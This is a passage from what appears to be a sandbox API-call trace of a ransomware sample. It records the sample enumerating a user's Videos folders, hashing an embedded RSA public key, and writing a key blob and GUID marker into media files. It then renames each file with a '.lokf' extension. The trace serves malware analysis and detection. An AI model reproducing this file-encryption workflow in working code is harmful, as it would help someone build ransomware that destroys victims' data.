KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.164] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.165] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.165] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.165] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.165] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.165] GetLastError () returned 0x0 [0060.165] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.165] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.165] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.165] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.165] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.165] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.166] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1961, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.166] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.166] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.166] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.166] CloseHandle (hObject=0x5cc) returned 1 [0060.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.173] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\H85jqiLOTT6NBZY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\h85jqilott6nbzy.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\H85jqiLOTT6NBZY.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\h85jqilott6nbzy.swf.lokf")) returned 1 [0060.174] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd795f920, ftCreationTime.dwHighDateTime=0x1d4cad2, ftLastAccessTime.dwLowDateTime=0x995d6f10, ftLastAccessTime.dwHighDateTime=0x1d4d1ff, ftLastWriteTime.dwLowDateTime=0x995d6f10, ftLastWriteTime.dwHighDateTime=0x1d4d1ff, nFileSizeHigh=0x0, nFileSizeLow=0x5c16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HXLOhG.swf", cAlternateFileName="")) returned 1 [0060.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.174] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\HXLOhG.swf") returned=".swf" [0060.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\HXLOhG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\hxlohg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.174] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=23574) returned 1 [0060.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.177] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5bf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.177] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.178] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.178] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x5c16, lpOverlapped=0x0) returned 1 [0060.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.178] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.178] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.179] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.179] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.179] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.179] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.179] GetLastError () returned 0x0 [0060.179] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.179] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.179] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.179] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.179] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5c20) returned 0x9c8bae8 [0060.179] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88d88 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bd8 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88dd0 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bf0 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c20 [0060.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c38 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.180] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c20 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c38 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85c20 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c20 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.180] GetCurrentThreadId () returned 0x9e0 [0060.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c89f80 [0060.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.181] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5c16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.181] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.181] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.181] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.181] CloseHandle (hObject=0x5cc) returned 1 [0060.182] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\HXLOhG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\hxlohg.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\HXLOhG.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\hxlohg.swf.lokf")) returned 1 [0060.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.182] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.183] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3b2a300, ftCreationTime.dwHighDateTime=0x1d4cba5, ftLastAccessTime.dwLowDateTime=0xf06cb5f0, ftLastAccessTime.dwHighDateTime=0x1d4cfba, ftLastWriteTime.dwLowDateTime=0xf06cb5f0, ftLastWriteTime.dwHighDateTime=0x1d4cfba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m Cm9nOn1JJtRb93m", cAlternateFileName="MCM9NO~1")) returned 1 [0060.184] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x272a63c0, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0x272a63c0, ftLastWriteTime.dwHighDateTime=0x1d4cd0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XeSTpd", cAlternateFileName="")) returned 1 [0060.184] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43e2de00, ftCreationTime.dwHighDateTime=0x1d4c938, ftLastAccessTime.dwLowDateTime=0x272a63c0, ftLastAccessTime.dwHighDateTime=0x1d4cd0f, ftLastWriteTime.dwLowDateTime=0x272a63c0, ftLastWriteTime.dwHighDateTime=0x1d4cd0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XeSTpd", cAlternateFileName="")) returned 0 [0060.184] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0060.184] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.184] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\") returned="jYsvlZ\\" [0060.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0060.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.184] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.184] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.184] PathFindFileNameW (pszPath="") returned="" [0060.184] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x5c61f380, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x5c61f380, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.184] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x5c61f380, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x5c61f380, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.184] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2823a6d0, ftCreationTime.dwHighDateTime=0x1d4cc1d, ftLastAccessTime.dwLowDateTime=0x44ad19c0, ftLastAccessTime.dwHighDateTime=0x1d4d0b5, ftLastWriteTime.dwLowDateTime=0x44ad19c0, ftLastWriteTime.dwHighDateTime=0x1d4d0b5, nFileSizeHigh=0x0, nFileSizeLow=0x96ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zuaS3cxhRUqW6PZe3HQ.mp4", cAlternateFileName="-ZUAS3~1.MP4")) returned 1 [0060.184] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\-zuaS3cxhRUqW6PZe3HQ.mp4") returned=".mp4" [0060.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\-zuaS3cxhRUqW6PZe3HQ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\-zuas3cxhruqw6pze3hq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.185] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=38573) returned 1 [0060.185] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.187] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9687, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.187] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.188] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x96ad, lpOverlapped=0x0) returned 1 [0060.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.188] lstrlenA (lpString="-----BEGIN PUBLIC 